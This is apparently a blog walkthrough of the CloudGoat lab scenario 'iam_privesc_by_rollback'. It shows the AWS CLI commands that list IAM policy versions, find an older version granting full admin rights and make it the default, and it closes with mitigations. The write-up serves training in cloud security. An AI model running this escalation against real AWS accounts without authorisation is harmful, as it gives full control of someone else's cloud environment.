Cloudgoat-Iam_Privesc_by_Rollback

,

CloudGoat IAM Privilege Escalation by Rollback - Complete Walkthrough

In this walkthrough, we’ll explore the CloudGoat scenario “iam_privesc_by_rollback”, which demonstrates how attackers can exploit IAM policy versioning to escalate privileges in AWS environments. This scenario teaches us how previous policy versions with elevated permissions can be restored to achieve administrative access through the SetDefaultPolicyVersion permission.

Initial Setup

Begin by configuring CloudGoat and whitelisting your IP address to ensure proper connectivity to the AWS environment.

1
cloudgoat config whitelist --auto

Create the IAM privilege escalation scenario using the following command:

1
cloudgoat create iam_privesc_by_rollback

Upon successful deployment, you’ll receive initial AWS credentials for the scenario:

1
2
raynor_access_key_id = AKIAQ************
raynor_secret_access_key = +ztS4/****************

Reconnaissance and Enumeration

The first step in any AWS penetration test involves thorough enumeration to understand available permissions and resources. Using automated enumeration tools can significantly speed up this process (AWS_enum).

1
python3 aws_auditor.py

The enumeration reveals an attached IAM policy with specific permissions:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "IAMPrivilegeEscalationByRollback",
      "Effect": "Allow",
      "Action": [
        "iam:Get*",
        "iam:List*",
        "iam:SetDefaultPolicyVersion"
      ],
      "Resource": "*"
    }
  ]
}

Policy Version Analysis

The key to this privilege escalation lies in examining policy versions. The iam:SetDefaultPolicyVersion permission combined with read access suggests potential for policy rollback attacks.

List all available policy versions:

1
aws iam list-policy-versions --policy-arn arn:aws:iam::ACCOUNT:policy/POLICY-NAME --profile init

This command reveals multiple policy versions:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
{
    "Versions": [
        {
            "VersionId": "v5",
            "IsDefaultVersion": false,
            "CreateDate": "2025-05-24T21:58:04+00:00"
        },
        {
            "VersionId": "v4",
            "IsDefaultVersion": false,
            "CreateDate": "2025-05-24T21:57:58+00:00"
        },
        {
            "VersionId": "v3",
            "IsDefaultVersion": false,
            "CreateDate": "2025-05-24T21:57:52+00:00"
        },
        {
            "VersionId": "v2",
            "IsDefaultVersion": false,
            "CreateDate": "2025-05-24T21:57:45+00:00"
        },
        {
            "VersionId": "v1",
            "IsDefaultVersion": true,
            "CreateDate": "2025-05-24T21:57:39+00:00"
        }
    ]
}

Exploitation

Examine each policy version to identify versions with elevated privileges. Version 3 contains the administrative permissions we’re looking for:

1
aws iam get-policy-version --policy-arn arn:aws:iam::ACCOUNT:policy/POLICY-NAME --version-id v3 --profile init

The policy version reveals full administrative access:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Action": "*",
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ]
        },
        "VersionId": "v3",
        "IsDefaultVersion": false,
        "CreateDate": "2025-05-24T22:08:15+00:00"
    }
}

Execute the privilege escalation by setting the administrative policy version as default:

1
2
3
4
aws iam set-default-policy-version \
  --policy-arn arn:aws:iam::ACCOUNT:policy/POLICY-NAME \
  --version-id v3 \
  --profile init

Also now the new version for (AWS_enum) includes managed policy versioning handling!

Impact and Verification

After successfully rolling back to the administrative policy version, you now possess full AWS administrative privileges. This escalation allows complete control over the AWS environment, including the ability to create new users, modify existing policies, access sensitive resources, and perform any administrative action.

Mitigation Strategies

Organizations should implement several controls to prevent IAM privilege escalation through policy rollback:

  • Policy Version Management: Regularly audit and remove unnecessary policy versions, especially those containing elevated privileges
  • Least Privilege Principle: Avoid granting iam:SetDefaultPolicyVersion permission unless absolutely necessary
  • Monitoring and Alerting: Implement CloudTrail monitoring for policy version changes and privilege escalation activities
  • Access Reviews: Conduct regular reviews of IAM policies and their version histories
  • Automation: Use infrastructure as code to maintain consistent policy configurations